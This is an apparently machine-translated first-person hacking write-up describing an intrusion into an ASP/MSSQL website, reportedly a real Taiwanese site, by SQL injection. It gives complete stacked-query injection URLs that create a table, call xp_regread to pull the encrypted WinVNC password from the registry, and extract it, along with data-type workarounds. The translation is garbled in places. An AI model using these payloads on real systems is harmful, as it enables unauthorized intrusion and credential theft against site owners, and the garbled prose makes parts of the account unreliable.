I believe that everyone is already familiar with the ASP MSSQL injection, even a person who does not understand the SQL syntax can also use NBSI to easily invade a large number of websites. But even a SQL INJECTION master, if there is only a DB_OWNER role in MSSQL, it can't guess the background of the website, it seems to be unknown; in addition to getting this idea with backup, I am not online. Find a better invasion. However, the Shell that is backed up is just the theoretical stuff. If a WebShell has 20MB, can you still use it? Not long ago, I met such a Taiwan website. The administrator's password was running out with NBSI, but the username was a pile of garbled in NBSI because it was a traditional reason. I also found the background, you can only have a job. How to do? I swept all the ports and found 5900, and it was estimated that the administrator used VNC to remotely control the server. At this time, I have a thinking that I can crack the VNC to read the encrypted password of the registry. See my performance!
The 5900 port of the Telnet server is obtained, as shown in Figure 1, confirming that the server is used is VNC. I believe that everyone will read XP_REGREAD to read the registry, and submit the following statement in turn:
http://www.something.com/script.asp?id=2;create Table [DBO]. [cyfd] ([GYFD] [char] (255));
In this way, we successfully built a table named CYFD, and added a type of Char and a field name GYFD with a length of 255. Then add data to the table:
_blank> http://www.something.com/script.asp?id=2;DECLARE @result varchar (255) EXEC master.dbo.xp_regread HKEY_CURRENT_USER, Software / ORL / WinVNC3, Password, @result output insert into cyfd ( GYFD) VALUES (@Result);
Read the value of the encrypted password of the registry from the registry, and then insert the value into the table just built. Then fetch the VNC encrypted password in the registry:
_BLANK> http://www.something.com/script.asp?id=2 and 1 = (Select Count (*) from Cyfd Where Gyfd> 1).
But the result is that I hope that the value of GYFD is empty. If this is easy, there will be no such article. What is this reason? My syntax is incorrect? Touching the check I didn't find mistakes. Is it different in the registry in the registry? Later I started to load VNC in this machine and test the test in the analysis. The result was a number 5. At this time, CZY is online, asked, he advised me to change the GYFD's field into binary data type binary. Try it. So I tested this machine, submit it as follows:
Http://127.0.0.1/script.asp?id=2;create table [dbo]. [cyfd] ([GYFD] [binary] (20));
http://127.0.0.1/script.asp?id=2;DECLARE @result binary (20) EXEC master.dbo.xp_regread HKEY_CURRENT_USER, Software / ORL / WinVNC3, Password, @result output insert into cyfd (gyfd) values ( @RESULT); - then I use the NBSI to run the value of the gyfd in the CYFD table. The result is coming out, the encrypted cryptographic value of VNC is 0x0e3515ac0000000000000000000000000000. But here is not right, I am in this machine's VNC password value in the registration table is HEX: 0E, 35, 15, AC, 00, 62, D3, 08 this. The original binary (n) data storage length is fixed. When the input binary length is less than N, the remaining length is filled in 0 supplements. My binary (20) written in the injection statement is enough to write the length of the VNC encrypted password, why is there so many 0 to populate? This is because my VNC password is a 0E3515AC0062D308. When I have encountered 00, XP_regread thinks that I have read its value, put 00 as a finish, so I only read 0x0e3515ac, I halo!
After turning over the book, I finally gave me a special data type UniqueIdentifier, which was used to store a 16-byte long binary data type. Transform the injection statement:
http://127.0.0.1/script.asp?id=2;create table [dbo]. [cyfd] ([GYFD] [UniqueIdentifier];
http://127.0.0.1/script.asp?id=2;DECLARE @result uniqueidentifier EXEC master.dbo.xp_regread HKEY_CURRENT_USER, Software / ORL / WinVNC3, Password, @result output insert into cyfd (gyfd) values (@result) ; -
Then run with NBSI, run out, but the result is the AC15350E-6200-08D3-0000-000000000000.
What is the difference between the AC15350E-6200-08D3-0000-000000000000 and I can see if the value of the correct VNC password in the registration table is different than the value of 0e3515ac0062d308? However, the order is reversed, I believe everyone will be the math of elementary school, this doesn't have to teach. Try to break the password of VNC with ca I, see if it is not possible.
It seems that there is all the tests made in this unit. This method uses the site on Taiwan. Hey, still does not run the password of VNC, maybe Traditional VNC is different in the registry. However, I studied a morning, I got a little gain, let's let go.
